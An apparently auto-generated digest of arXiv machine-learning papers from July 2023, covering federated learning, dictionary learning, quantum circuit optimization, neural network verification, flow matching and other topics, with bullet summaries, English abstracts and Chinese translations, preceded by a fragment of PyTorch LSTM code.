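    Input and output dimensions, and the choice to regress a single scalar per
    sequence, are illustrative assumptions rather than the paper's exact setup.
    """
    def __init__(self, in_dim=4, hidden=64):
        super().__init__()
        self.lstm = nn.LSTM(in_dim, hidden, batch_first=True)
        self.head = nn.Linear(hidden, 1)

    def forward(self, x):                # x: (batch, time, in_dim)
        out, _ = self.lstm(x)
        return self.head(out[:, -1, :])  # predict from the last hidden state

model = ResponseLSTM()
seq = torch.randn(8, 200, 4)             # e.g. 200 time steps of wave/heading features
print(model(seq).shape)                   # torch.Size([8, 1])
```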

Local or Global: Selective Knowledge Assimilation for Federated Learning with Limited Labels

  • paper_url: http://arxiv.org/abs/2307.08809
  • repo_url: None
  • paper_authors: Yae Jee Cho, Gauri Joshi, Dimitrios Dimitriadis
  • for: To improve federated learning (FL) when clients have only limited labeled data.
  • methods: The proposed FedLabel lets each client choose between its local model and the global model to pseudo-label its unlabeled data, depending on which is more of an expert for that data, and additionally exploits both models' knowledge through a global-local consistency regularization that minimizes the divergence between the two models' outputs when they agree on the pseudo-label. (A small pseudo-labeling sketch follows this entry.)
  • results: In both cross-device and cross-silo settings, FedLabel outperforms other semi-supervised FL baselines by 8-24%, and with only 5-20% labeled data it even outperforms a standard fully supervised FL baseline trained on 100% labeled data.
    Abstract Many existing FL methods assume clients with fully-labeled data, while in realistic settings, clients have limited labels due to the expensive and laborious process of labeling. Limited labeled local data of the clients often leads to their local model having poor generalization abilities to their larger unlabeled local data, such as having class-distribution mismatch with the unlabeled data. As a result, clients may instead look to benefit from the global model trained across clients to leverage their unlabeled data, but this also becomes difficult due to data heterogeneity across clients. In our work, we propose FedLabel where clients selectively choose the local or global model to pseudo-label their unlabeled data depending on which is more of an expert of the data. We further utilize both the local and global models' knowledge via global-local consistency regularization which minimizes the divergence between the two models' outputs when they have identical pseudo-labels for the unlabeled data. Unlike other semi-supervised FL baselines, our method does not require additional experts other than the local or global model, nor require additional parameters to be communicated. We also do not assume any server-labeled data or fully labeled clients. For both cross-device and cross-silo settings, we show that FedLabel outperforms other semi-supervised FL baselines by $8$-$24\%$, and even outperforms standard fully supervised FL baselines ($100\%$ labeled data) with only $5$-$20\%$ of labeled data.
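The selective pseudo-labeling plus global-local consistency idea can be sketched roughly as below; the confidence-based selection rule, the 0.95 threshold, the KL-based consistency term, and the loss weighting are all assumptions for illustration and may not match the paper's exact formulation.

```python
import torch
import torch.nn.functional as F

def fedlabel_unsup_loss(local_logits, global_logits, student_logits,
                        conf_thresh=0.95, lam=1.0):
    """Toy version of confidence-based pseudo-label selection plus a global-local
    consistency term. Threshold, KL divergence, and `lam` are illustrative assumptions."""
    p_local, p_global = F.softmax(local_logits, -1), F.softmax(global_logits, -1)
    # Pick, per example, whichever teacher is more confident ("more of an expert").
    use_local = p_local.max(-1).values >= p_global.max(-1).values
    teacher = torch.where(use_local.unsqueeze(-1), p_local, p_global)
    conf, pseudo = teacher.max(-1)

    mask = (conf >= conf_thresh).float()                  # keep only confident pseudo-labels
    ce = F.cross_entropy(student_logits, pseudo, reduction="none")
    pseudo_loss = (mask * ce).mean()

    # Consistency: pull local and global predictions together when they agree.
    agree = (p_local.argmax(-1) == p_global.argmax(-1)).float()
    consistency = (agree * F.kl_div(p_local.log(), p_global, reduction="none").sum(-1)).mean()
    return pseudo_loss + lam * consistency

logits = [torch.randn(16, 10) for _ in range(3)]
print(fedlabel_unsup_loss(*logits))
```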

Anomaly Detection with Selective Dictionary Learning

  • paper_url: http://arxiv.org/abs/2307.08807
  • repo_url: https://github.com/denisilie94/pyod-dl
  • paper_authors: Denis C. Ilie-Ablachim, Bogdan Dumitrescu
  • for: This work presents new anomaly detection methods based on Dictionary Learning (DL) and Kernel Dictionary Learning (KDL).
  • methods: Known DL and KDL algorithms are adapted into unsupervised outlier detectors; a reduced kernel version (RKDL) is proposed for large data sets where the kernel matrix becomes large, and a random selection of signals is used during training to keep outliers out of the training procedure. (A reconstruction-error scoring sketch follows this entry.)
  • results: All algorithms are released in an anomaly detection toolbox and compared against standard benchmark results.
    Abstract In this paper we present new methods of anomaly detection based on Dictionary Learning (DL) and Kernel Dictionary Learning (KDL). The main contribution consists in the adaption of known DL and KDL algorithms in the form of unsupervised methods, used for outlier detection. We propose a reduced kernel version (RKDL), which is useful for problems with large data sets, due to the large kernel matrix. We also improve the DL and RKDL methods by the use of a random selection of signals, which aims to eliminate the outliers from the training procedure. All our algorithms are introduced in an anomaly detection toolbox and are compared to standard benchmark results.
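A generic reconstruction-error baseline conveys the underlying idea of dictionary-learning-based outlier scoring: signals that a dictionary trained on (mostly) normal data reconstructs poorly are flagged as anomalies. The scikit-learn sketch below is only such a baseline, not the paper's DL/KDL/RKDL algorithms (those are in the linked pyod-dl repository).

```python
import numpy as np
from sklearn.decomposition import DictionaryLearning

rng = np.random.default_rng(0)
X_train = rng.normal(size=(200, 20))                 # assumed "mostly normal" signals
X_test = np.vstack([rng.normal(size=(5, 20)),        # normal samples
                    rng.normal(size=(5, 20)) + 6.0])  # shifted outliers

# Learn a dictionary on (mostly) normal data, then score by reconstruction error.
dl = DictionaryLearning(n_components=10, transform_algorithm="omp",
                        transform_n_nonzero_coefs=3, random_state=0)
dl.fit(X_train)
codes = dl.transform(X_test)                          # sparse codes
recon = codes @ dl.components_                        # reconstructed signals
scores = np.linalg.norm(X_test - recon, axis=1)       # larger = more anomalous
print(np.round(scores, 2))
```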

Towards Automated Design of Riboswitches

  • paper_url: http://arxiv.org/abs/2307.08801
  • repo_url: None
  • paper_authors: Frederic Runge, Jörg K. H. Franke, Frank Hutter
  • for: This work aims to develop a new computational method that reduces the cost of experimental screening and selection pipelines for discovering novel riboswitches.
  • methods: It presents libLEARNA, a structure-based design method that provides RNA focus libraries of diverse variable-length qualified candidates while considering global properties as well as desired sequence and structure features.
  • results: Following a previously published protocol, designing theophylline riboswitch libraries with libLEARNA yielded 30% more unique high-quality candidates.
    Abstract Experimental screening and selection pipelines for the discovery of novel riboswitches are expensive, time-consuming, and inefficient. Using computational methods to reduce the number of candidates for the screen could drastically decrease these costs. However, existing computational approaches do not fully satisfy all requirements for the design of such initial screening libraries. In this work, we present a new method, libLEARNA, capable of providing RNA focus libraries of diverse variable-length qualified candidates. Our novel structure-based design approach considers global properties as well as desired sequence and structure features. We demonstrate the benefits of our method by designing theophylline riboswitch libraries, following a previously published protocol, and yielding 30% more unique high-quality candidates.

regulAS: A Bioinformatics Tool for the Integrative Analysis of Alternative Splicing Regulome using RNA-Seq data

  • paper_url: http://arxiv.org/abs/2307.08800
  • repo_url: https://github.com/slipnitskaya/regulas
  • paper_authors: Sofya Lipnitskaya
  • for: regulAS is designed to support computational biology researchers in investigating regulatory mechanisms of splicing alterations in cancer and healthy human donors.
  • methods: regulAS uses integrative analysis of large-scale RNA-Seq data from TCGA and GTEx projects, with features such as RNA-Seq data retrieval, predictive modeling, and flexible reporting.
  • results: regulAS provides automated solutions for alternative splicing and cancer biology studies, enhancing efficiency, reproducibility, and customization of experimental design, with the extensibility to tailor the software to specific research needs.
    Abstract The regulAS software package is a bioinformatics tool designed to support computational biology researchers in investigating regulatory mechanisms of splicing alterations through integrative analysis of large-scale RNA-Seq data from cancer and healthy human donors, characterized by TCGA and GTEx projects. This technical report provides a comprehensive overview of regulAS, focusing on its core functionality, basic modules, experiment configuration, further extensibility and customisation. The core functionality of regulAS enables the automation of computational experiments, efficient results storage and processing, and streamlined workflow management. Integrated basic modules extend regulAS with features such as RNA-Seq data retrieval from the public multi-omics UCSC Xena data repository, predictive modeling and feature ranking capabilities using the scikit-learn package, and flexible reporting generation for analysing gene expression profiles and relevant modulations of alternative splicing aberrations across tissues and cancer types. Experiment configuration is handled through YAML files with the Hydra and OmegaConf libraries, offering a user-friendly approach. Additionally, regulAS allows for the development and integration of custom modules to handle specialized tasks. In conclusion, regulAS provides an automated solution for alternative splicing and cancer biology studies, enhancing efficiency, reproducibility, and customization of experimental design, while the extensibility of the pipeline enables researchers to further tailor the software package to their specific needs. Source code is available under the MIT license at https://github.com/slipnitskaya/regulAS.

Reduced Kernel Dictionary Learning

  • paper_url: http://arxiv.org/abs/2307.08798
  • repo_url: https://github.com/denisilie94/rkdl
  • paper_authors: Denis C. Ilie-Ablachim, Bogdan Dumitrescu
  • for: This paper addresses a common problem when applying kernel dictionary learning to large data sets: the size of the kernel matrix.
  • methods: It proposes new algorithms for training reduced-size nonlinear representations, in which the kernel vectors are obtained from a trained sparse representation of the input signals and are optimized directly with gradient descent steps during the KDL process.
  • results: Experiments on three data sets show that the method provides better representations despite using a small number of kernel vectors, while also reducing execution time with respect to KDL.
    Abstract In this paper we present new algorithms for training reduced-size nonlinear representations in the Kernel Dictionary Learning (KDL) problem. Standard KDL has the drawback of a large size of the kernel matrix when the data set is large. There are several ways of reducing the kernel size, notably Nystr\"om sampling. We propose here a method more in the spirit of dictionary learning, where the kernel vectors are obtained with a trained sparse representation of the input signals. Moreover, we optimize directly the kernel vectors in the KDL process, using gradient descent steps. We show with three data sets that our algorithms are able to provide better representations, despite using a small number of kernel vectors, and also decrease the execution time with respect to KDL.

Classification with Incoherent Kernel Dictionary Learning

  • paper_url: http://arxiv.org/abs/2307.08796
  • repo_url: https://github.com/denisilie94/incoherent-kernel-dictionary-learning
  • paper_authors: Denis C. Ilie-Ablachim, Bogdan Dumitrescu
  • for: This paper presents a new classification method based on Dictionary Learning (DL).
  • methods: The main contribution is a kernel version of incoherent DL, derived from its standard linear counterpart, together with an improvement of the representation update in the AK-SVD algorithm.
  • results: The algorithms are tested on several popular databases of classification problems with good results.
    Abstract In this paper we present a new classification method based on Dictionary Learning (DL). The main contribution consists of a kernel version of incoherent DL, derived from its standard linear counterpart. We also propose an improvement of the AK-SVD algorithm concerning the representation update. Our algorithms are tested on several popular databases of classification problems.

Non-Stationary Policy Learning for Multi-Timescale Multi-Agent Reinforcement Learning

  • paper_url: http://arxiv.org/abs/2307.08794
  • repo_url: None
  • paper_authors: Patrick Emami, Xiangyu Zhang, David Biagioni, Ahmed S. Zamzam
  • for: This paper addresses learning non-stationary policies in multi-timescale multi-agent reinforcement learning (MARL) environments.
  • methods: The paper proposes a simple framework for learning non-stationary policies, using available information about agent timescales to define a periodic time encoding. The proposed algorithm uses phase-functioned neural networks to parameterize the actor and critic, providing an inductive bias for periodicity. (A periodic-encoding sketch follows this entry.)
  • results: The paper demonstrates the effectiveness of the proposed framework in learning multi-timescale policies through simulations in a gridworld and building energy management environment.
    Abstract In multi-timescale multi-agent reinforcement learning (MARL), agents interact across different timescales. In general, policies for time-dependent behaviors, such as those induced by multiple timescales, are non-stationary. Learning non-stationary policies is challenging and typically requires sophisticated or inefficient algorithms. Motivated by the prevalence of this control problem in real-world complex systems, we introduce a simple framework for learning non-stationary policies for multi-timescale MARL. Our approach uses available information about agent timescales to define a periodic time encoding. In detail, we theoretically demonstrate that the effects of non-stationarity introduced by multiple timescales can be learned by a periodic multi-agent policy. To learn such policies, we propose a policy gradient algorithm that parameterizes the actor and critic with phase-functioned neural networks, which provide an inductive bias for periodicity. The framework's ability to effectively learn multi-timescale policies is validated on a gridworld and building energy management environment.
    摘要 在多时间尺度多智能体强化学习(MARL)中,智能体在不同的时间尺度上交互。一般而言,由多时间尺度等时间依赖行为诱导出的策略是非平稳的。学习非平稳策略具有挑战性,通常需要复杂或低效的算法。受这一控制问题在现实复杂系统中普遍存在的启发,我们提出了一个用于学习多时间尺度MARL非平稳策略的简单框架。我们利用关于智能体时间尺度的已知信息来定义周期性时间编码,并从理论上证明由多时间尺度引入的非平稳效应可以由周期性多智能体策略学习得到。为学习这类策略,我们提出了一种策略梯度算法,用相位函数神经网络(phase-functioned neural networks)来参数化actor和critic,从而提供周期性的归纳偏置。该框架学习多时间尺度策略的有效性在网格世界和建筑能源管理环境中得到了验证。
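
As a rough illustration of the periodic time encoding idea described above, the following sketch (the exact feature construction in the paper may differ; the periods here are assumed for illustration) maps a global step index to sin/cos phase features, one pair per agent timescale, so the encoding repeats with the agents' periods:

```python
import numpy as np

def periodic_time_encoding(t, periods):
    """Encode global step t as sin/cos phases, one pair per agent timescale.

    periods: e.g. [1, 5, 20] for agents acting every 1, 5 and 20 steps.
    The encoding is periodic in t, which is the inductive bias used for
    non-stationary multi-timescale policies.
    """
    feats = []
    for p in periods:
        phase = 2.0 * np.pi * (t % p) / p
        feats.extend([np.sin(phase), np.cos(phase)])
    return np.asarray(feats, dtype=np.float32)

# The encoding repeats every lcm(1, 5, 20) = 20 steps.
print(periodic_time_encoding(3, [1, 5, 20]))
print(np.allclose(periodic_time_encoding(3, [1, 5, 20]),
                  periodic_time_encoding(23, [1, 5, 20])))  # True
```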

Quarl: A Learning-Based Quantum Circuit Optimizer

  • paper_url: http://arxiv.org/abs/2307.10120
  • repo_url: None
  • paper_authors: Zikun Li, Jinjun Peng, Yixuan Mei, Sina Lin, Yi Wu, Oded Padon, Zhihao Jia
  • for: 优化量子电路是一个搜索空间庞大、且需要应用一些会暂时降低性能的变换才能获得最终提升的优化问题。这篇论文介绍了Quarl,一种基于学习的量子电路优化器。
  • methods: Quarl使用强化学习(RL)来优化量子电路,但RL在该问题上面临两大挑战:庞大且变化的动作空间,以及不均匀的状态表示。Quarl通过一种新的神经网络架构和RL训练过程来解决这些问题。
  • results: 评估显示,Quarl在大多数基准电路上显著超越了现有的电路优化器。此外,Quarl还能学会执行旋转合并,这是现有优化器中需要作为单独流程实现的一种复杂、非局部的电路优化。
    Abstract Optimizing quantum circuits is challenging due to the very large search space of functionally equivalent circuits and the necessity of applying transformations that temporarily decrease performance to achieve a final performance improvement. This paper presents Quarl, a learning-based quantum circuit optimizer. Applying reinforcement learning (RL) to quantum circuit optimization raises two main challenges: the large and varying action space and the non-uniform state representation. Quarl addresses these issues with a novel neural architecture and RL-training procedure. Our neural architecture decomposes the action space into two parts and leverages graph neural networks in its state representation, both of which are guided by the intuition that optimization decisions can be mostly guided by local reasoning while allowing global circuit-wide reasoning. Our evaluation shows that Quarl significantly outperforms existing circuit optimizers on almost all benchmark circuits. Surprisingly, Quarl can learn to perform rotation merging, a complex, non-local circuit optimization implemented as a separate pass in existing optimizers.
    摘要 优化量子电路是一项具有挑战性的任务,因为功能等价电路的搜索空间非常庞大,并且需要应用一些会暂时降低性能的变换才能获得最终的性能提升。本文介绍Quarl,一种基于学习的量子电路优化器。将强化学习(RL)应用于量子电路优化面临两大挑战:庞大且变化的动作空间,以及不均匀的状态表示。Quarl通过一种新的神经网络架构和RL训练过程来解决这些问题。该架构将动作空间分解为两部分,并在状态表示中使用图神经网络,二者均基于这样一个直觉:优化决策大多可以由局部推理引导,同时保留全电路范围的全局推理。评估结果表明,Quarl在几乎所有基准电路上显著优于现有的电路优化器。令人惊讶的是,Quarl还能学会执行旋转合并,这是一种在现有优化器中需要作为单独流程实现的复杂、非局部电路优化。

A DPLL(T) Framework for Verifying Deep Neural Networks

  • paper_url: http://arxiv.org/abs/2307.10266
  • repo_url: https://github.com/dynaroars/neuralsat-solver
  • paper_authors: Hai Duong, Linhan Li, ThanhVu Nguyen, Matthew Dwyer
  • for: 这个论文是为了提出一种新的深度神经网络验证方法,帮助检测和修复神经网络中的漏洞和攻击。
  • methods: 该方法基于DPLL(T)算法,包括冲突学习、抽象和理论解决,可以看作是一种基于SMT的神经网络验证框架。
  • results: 初步结果表明,NeuralSAT原型与当前最先进的方法相比具有竞争力。我们希望通过适当的优化和工程化,NeuralSAT能够把现代SAT/SMT求解器的能力与成功带到神经网络验证中,并推动该领域的发展。
    Abstract Deep Neural Networks (DNNs) have emerged as an effective approach to tackling real-world problems. However, like human-written software, automatically-generated DNNs can have bugs and be attacked. This thus attracts many recent interests in developing effective and scalable DNN verification techniques and tools. In this work, we introduce a NeuralSAT, a new constraint solving approach to DNN verification. The design of NeuralSAT follows the DPLL(T) algorithm used modern SMT solving, which includes (conflict) clause learning, abstraction, and theory solving, and thus NeuralSAT can be considered as an SMT framework for DNNs. Preliminary results show that the NeuralSAT prototype is competitive to the state-of-the-art. We hope, with proper optimization and engineering, NeuralSAT will carry the power and success of modern SAT/SMT solvers to DNN verification. NeuralSAT is avaliable from: https://github.com/dynaroars/neuralsat-solver
    摘要 深度神经网络(DNN)已成为解决现实世界问题的有效方法。然而,与人工编写的软件一样,自动生成的DNN也可能存在缺陷并遭受攻击。这引发了人们对开发有效且可扩展的DNN验证技术与工具的广泛关注。在这项工作中,我们介绍了NeuralSAT,一种用于DNN验证的新的约束求解方法。NeuralSAT的设计遵循现代SMT求解中使用的DPLL(T)算法,包括(冲突)子句学习、抽象和理论求解,因此NeuralSAT可以视为面向DNN的SMT框架。初步结果表明,NeuralSAT原型与当前最先进方法相比具有竞争力。我们希望,通过适当的优化和工程化,NeuralSAT能够把现代SAT/SMT求解器的能力与成功带到DNN验证中。NeuralSAT可从以下地址获取:https://github.com/dynaroars/neuralsat-solver

A mixed policy to improve performance of language models on math problems

  • paper_url: http://arxiv.org/abs/2307.08767
  • repo_url: https://github.com/vividitytech/math_lm_rl
  • paper_authors: Gang Chen
  • for: 在求解数学问题时,语言模型通常按条件概率采样来预测下一个词,这在数学推理步骤中可能产生错误答案。鉴于数学问题是确定性的,我们提出一种混合策略探索方法,利用强化学习来求解数学问题。
  • methods: 我们提出了一种两级的词元(token)探索策略:抽象层按概率采样决定下一个词元是运算符还是操作数,第二层则以贪心方式确定性地选择得分最高的词元。
  • results: 我们在 GSM8K 数据集上用 GPT-2 模型测试了该方法,获得了超过 2% 的性能提升。实现代码见 https://github.com/vividitytech/math_lm_rl 。
    Abstract When to solve math problems, most language models take a sampling strategy to predict next word according conditional probabilities. In the math reasoning step, it may generate wrong answer. Considering math problems are deterministic, we propose a mixed policy exploration approach to solve math problems with reinforcement learning. In peculiar, we propose a two level token exploration policy: the abstract level explores next token with probability and the second level is deterministic. Specifically, the abstract level policy will decide whether the token is operator or operand with probability sampling, while the second level is deterministic to select next token with the highest score in a greedy way. We test our method on GSM8K dataset with GPT-2 model, and demonstrate more than $2\%$ performance gain. Our implementation is available at https://github.com/vividitytech/math_lm_rl.
    摘要 在求解数学问题时,大多数语言模型按条件概率采用采样策略来预测下一个词,这在数学推理步骤中可能产生错误答案。考虑到数学问题是确定性的,我们提出了一种基于强化学习的混合策略探索方法来求解数学问题。具体而言,我们提出了一个两级的词元探索策略:抽象层按概率采样决定下一个词元是运算符还是操作数,第二层则以贪心方式确定性地选择得分最高的词元。我们在 GSM8K 数据集上用 GPT-2 模型测试了该方法,获得了超过 2% 的性能提升。实现代码见 https://github.com/vividitytech/math_lm_rl 。
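
A toy sketch of the two-level token exploration policy described above; the operator/operand vocabulary split and the logits here are illustrative stand-ins, not the repository's actual GPT-2 integration:

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical vocabulary split into operator and operand tokens.
OPERATORS = ["+", "-", "*", "/", "="]
OPERANDS = [str(d) for d in range(10)]
VOCAB = OPERATORS + OPERANDS

def softmax(x):
    x = x - x.max()
    e = np.exp(x)
    return e / e.sum()

def mixed_policy_step(logits):
    """Two-level exploration: sample the token *type* stochastically,
    then pick the highest-scoring token of that type greedily."""
    probs = softmax(logits)
    p_operator = sum(probs[VOCAB.index(t)] for t in OPERATORS)
    # Level 1: probabilistic choice between operator / operand.
    choose_operator = rng.random() < p_operator
    pool = OPERATORS if choose_operator else OPERANDS
    # Level 2: deterministic, greedy pick within the chosen pool.
    return max(pool, key=lambda t: logits[VOCAB.index(t)])

logits = rng.normal(size=len(VOCAB))
print(mixed_policy_step(logits))
```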

Quality Assessment of Photoplethysmography Signals For Cardiovascular Biomarkers Monitoring Using Wearable Devices

  • paper_url: http://arxiv.org/abs/2307.08766
  • repo_url: None
  • paper_authors: Felipe M. Dias, Marcelo A. F. Toledo, Diego A. C. Cardenas, Douglas A. Almeida, Filipe A. C. Oliveira, Estela Ribeiro, Jose E. Krieger, Marco A. Gutierrez
  • for: 该研究旨在评估光电容积脉搏波(PPG)信号的质量,以支持基于可穿戴设备的心血管生物标志物监测。
  • methods: 研究从PPG信号中提取了27个统计特征,用于训练机器学习模型(包括XGBoost、CatBoost和随机森林),以区分高质量和低质量的PPG信号。
  • results: 三种模型的Se、PPV和F1-score分别为:XGBoost 94.4、95.6、95.0;CatBoost 94.7、95.9、95.3;随机森林 93.7、91.3、92.5。这些结果与文献中的最新水平相当,表明机器学习模型有望用于开发远程、无创、连续的测量设备。
    Abstract Photoplethysmography (PPG) is a non-invasive technology that measures changes in blood volume in the microvascular bed of tissue. It is commonly used in medical devices such as pulse oximeters and wrist worn heart rate monitors to monitor cardiovascular hemodynamics. PPG allows for the assessment of parameters (e.g., heart rate, pulse waveform, and peripheral perfusion) that can indicate conditions such as vasoconstriction or vasodilation, and provides information about microvascular blood flow, making it a valuable tool for monitoring cardiovascular health. However, PPG is subject to a number of sources of variations that can impact its accuracy and reliability, especially when using a wearable device for continuous monitoring, such as motion artifacts, skin pigmentation, and vasomotion. In this study, we extracted 27 statistical features from the PPG signal for training machine-learning models based on gradient boosting (XGBoost and CatBoost) and Random Forest (RF) algorithms to assess quality of PPG signals that were labeled as good or poor quality. We used the PPG time series from a publicly available dataset and evaluated the algorithm s performance using Sensitivity (Se), Positive Predicted Value (PPV), and F1-score (F1) metrics. Our model achieved Se, PPV, and F1-score of 94.4, 95.6, and 95.0 for XGBoost, 94.7, 95.9, and 95.3 for CatBoost, and 93.7, 91.3 and 92.5 for RF, respectively. Our findings are comparable to state-of-the-art reported in the literature but using a much simpler model, indicating that ML models are promising for developing remote, non-invasive, and continuous measurement devices.
    摘要 光电容积脉搏波(PPG)是一种无创技术,用于测量组织微血管床中血容量的变化。它常用于脉搏血氧仪和腕戴式心率监测等医疗设备中,以监测心血管血流动力学。PPG可用于评估心率、脉搏波形和外周灌注等参数,这些参数可提示血管收缩或血管舒张等状态,并提供微血管血流的信息,因此是监测心血管健康的有用工具。然而,PPG容易受到多种因素的影响,尤其是在使用可穿戴设备进行连续监测时,例如运动伪影、皮肤色素沉着和血管舒缩。在本研究中,我们从PPG信号中提取了27个统计特征,用于训练基于梯度提升(XGBoost和CatBoost)和随机森林(RF)的机器学习模型,以评估被标注为高质量或低质量的PPG信号。我们使用公开数据集中的PPG时间序列,并以灵敏度(Se)、阳性预测值(PPV)和F1分数(F1)评估算法性能。模型的Se、PPV和F1分别为:XGBoost 94.4、95.6、95.0;CatBoost 94.7、95.9、95.3;RF 93.7、91.3、92.5。我们的结果与文献报道的最新水平相当,但所用模型更为简单,表明机器学习模型有望用于开发远程、无创、连续的测量设备。
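
A minimal, illustrative pipeline in the spirit of the study above; it uses only a handful of hand-picked statistical features, synthetic signals, and a scikit-learn forest, so it will not reproduce the reported 27-feature XGBoost/CatBoost numbers:

```python
import numpy as np
from scipy.stats import skew, kurtosis
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score, f1_score

def ppg_features(segment):
    """A few illustrative statistical features of a PPG segment
    (the paper extracts 27 such features)."""
    return np.array([
        segment.mean(), segment.std(),
        skew(segment), kurtosis(segment),
        np.percentile(segment, 75) - np.percentile(segment, 25),
        np.abs(np.diff(segment)).mean(),          # mean absolute slope
    ])

# Toy data: clean pulse-like waves = good quality, heavy noise = poor quality.
rng = np.random.default_rng(0)
t = np.linspace(0, 8, 1000)
good = [np.sin(2 * np.pi * 1.2 * t) + 0.05 * rng.normal(size=t.size) for _ in range(50)]
poor = [rng.normal(size=t.size) for _ in range(50)]
X = np.stack([ppg_features(s) for s in good + poor])
y = np.array([1] * 50 + [0] * 50)

clf = RandomForestClassifier(n_estimators=200, random_state=0).fit(X[::2], y[::2])
pred = clf.predict(X[1::2])
print(recall_score(y[1::2], pred),     # sensitivity (Se)
      precision_score(y[1::2], pred),  # positive predictive value (PPV)
      f1_score(y[1::2], pred))
```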

A Novel Application of Conditional Normalizing Flows: Stellar Age Inference with Gyrochronology

  • paper_url: http://arxiv.org/abs/2307.08753
  • repo_url: None
  • paper_authors: Phil Van-Lane, Joshua S. Speagle, Stephanie Douglas
  • for: 用于推断小质量主序星的年龄
  • methods: 使用条件归一化流(conditional normalizing flows)这一机器学习方法分析疏散星团的测光数据
  • results: 得到的年龄估计与文献值相符,为恒星年龄推断提供了一种数据驱动的概率性方法
    Abstract Stellar ages are critical building blocks of evolutionary models, but challenging to measure for low mass main sequence stars. An unexplored solution in this regime is the application of probabilistic machine learning methods to gyrochronology, a stellar dating technique that is uniquely well suited for these stars. While accurate analytical gyrochronological models have proven challenging to develop, here we apply conditional normalizing flows to photometric data from open star clusters, and demonstrate that a data-driven approach can constrain gyrochronological ages with a precision comparable to other standard techniques. We evaluate the flow results in the context of a Bayesian framework, and show that our inferred ages recover literature values well. This work demonstrates the potential of a probabilistic data-driven solution to widen the applicability of gyrochronological stellar dating.
    摘要 恒星年龄是恒星演化模型的关键组成部分,但对小质量主序星而言难以测量。在这一领域,一个尚未被探索的方案是将概率式机器学习方法应用于转动年代学(gyrochronology),这是一种特别适合此类恒星的恒星定年技术。虽然精确的解析转动年代学模型一直难以建立,但我们在此将条件归一化流应用于疏散星团的测光数据,证明数据驱动的方法能够以与其他标准技术相当的精度约束转动年代学年龄。我们在贝叶斯框架下评估流模型的结果,并表明推断出的年龄与文献值吻合良好。这项工作展示了概率式数据驱动方案在扩展转动年代学恒星定年适用范围方面的潜力。

Flow Matching in Latent Space

  • paper_url: http://arxiv.org/abs/2307.08698
  • repo_url: https://github.com/vinairesearch/lfm
  • paper_authors: Quan Dao, Hao Phung, Binh Nguyen, Anh Tran
  • for: train generative models with improved computational efficiency and scalability for high-resolution image synthesis
  • methods: apply flow matching in the latent spaces of pretrained autoencoders, integrate various conditions for conditional generation tasks
  • results: effective in both quantitative and qualitative results on various datasets, provide theoretical control of the Wasserstein-2 distance between the reconstructed latent flow distribution and true data distribution
    Abstract Flow matching is a recent framework to train generative models that exhibits impressive empirical performance while being relatively easier to train compared with diffusion-based models. Despite its advantageous properties, prior methods still face the challenges of expensive computing and a large number of function evaluations of off-the-shelf solvers in the pixel space. Furthermore, although latent-based generative methods have shown great success in recent years, this particular model type remains underexplored in this area. In this work, we propose to apply flow matching in the latent spaces of pretrained autoencoders, which offers improved computational efficiency and scalability for high-resolution image synthesis. This enables flow-matching training on constrained computational resources while maintaining their quality and flexibility. Additionally, our work stands as a pioneering contribution in the integration of various conditions into flow matching for conditional generation tasks, including label-conditioned image generation, image inpainting, and semantic-to-image generation. Through extensive experiments, our approach demonstrates its effectiveness in both quantitative and qualitative results on various datasets, such as CelebA-HQ, FFHQ, LSUN Church & Bedroom, and ImageNet. We also provide a theoretical control of the Wasserstein-2 distance between the reconstructed latent flow distribution and true data distribution, showing it is upper-bounded by the latent flow matching objective. Our code will be available at https://github.com/VinAIResearch/LFM.git.
    摘要 流匹配(flow matching)是最近提出的一种生成模型训练框架,相比基于扩散的模型更易训练,并展现出令人印象深刻的实验性能。尽管具有这些优点,现有方法仍面临计算开销高昂、以及在像素空间中需要对现成求解器进行大量函数评估的问题。此外,尽管基于隐空间的生成方法近年取得了巨大成功,这一类模型在该方向上仍缺乏探索。在这项工作中,我们提议在预训练自编码器的隐空间中应用流匹配,从而为高分辨率图像合成带来更高的计算效率和可扩展性,使得在受限的计算资源上也能进行流匹配训练,同时保持质量与灵活性。此外,我们的工作率先将多种条件整合进流匹配以用于条件生成任务,包括按标签条件的图像生成、图像修复和语义图到图像生成。大量实验表明,我们的方法在 CelebA-HQ、FFHQ、LSUN Church & Bedroom 和 ImageNet 等多个数据集上均取得了良好的定量与定性结果。我们还从理论上控制了重建的隐空间流分布与真实数据分布之间的 Wasserstein-2 距离,证明其上界为隐空间流匹配目标。代码将发布于 https://github.com/VinAIResearch/LFM.git 。
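
A compact sketch of the flow matching objective on latent codes, as described above; the pretrained autoencoder, the conditioning mechanisms, and the actual LFM architecture are omitted, and the tensors below are random stand-ins:

```python
import torch
import torch.nn as nn

class VelocityNet(nn.Module):
    """Tiny stand-in for the latent velocity field v_theta(x_t, t)."""
    def __init__(self, dim):
        super().__init__()
        self.net = nn.Sequential(nn.Linear(dim + 1, 256), nn.SiLU(),
                                 nn.Linear(256, dim))

    def forward(self, x, t):
        return self.net(torch.cat([x, t], dim=-1))

dim = 16                         # latent dimension of the pretrained autoencoder
v = VelocityNet(dim)
opt = torch.optim.Adam(v.parameters(), lr=1e-3)

for step in range(100):
    z1 = torch.randn(64, dim)    # stand-in for encoder latents of real images
    z0 = torch.randn(64, dim)    # noise sample
    t = torch.rand(64, 1)
    x_t = (1 - t) * z0 + t * z1  # linear interpolation path
    target = z1 - z0             # its constant velocity
    loss = ((v(x_t, t) - target) ** 2).mean()   # flow matching loss
    opt.zero_grad()
    loss.backward()
    opt.step()
# At sampling time one would integrate the learned velocity field from noise
# to a latent code and decode it with the pretrained autoencoder.
```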

A Multiobjective Reinforcement Learning Framework for Microgrid Energy Management

  • paper_url: http://arxiv.org/abs/2307.08692
  • repo_url: None
  • paper_authors: M. Vivienne Liu, Patrick M. Reed, David Gold, Garret Quist, C. Lindsay Anderson
  • for: 提供一种解决多目标冲突的微grid操作方法
  • methods: 利用外生信息和数据驱动学习来探索高维目标空间,找到多目标之间的补做
  • results: 比Status quo操作更高效,提供多样化、适应性和可解释的操作方法
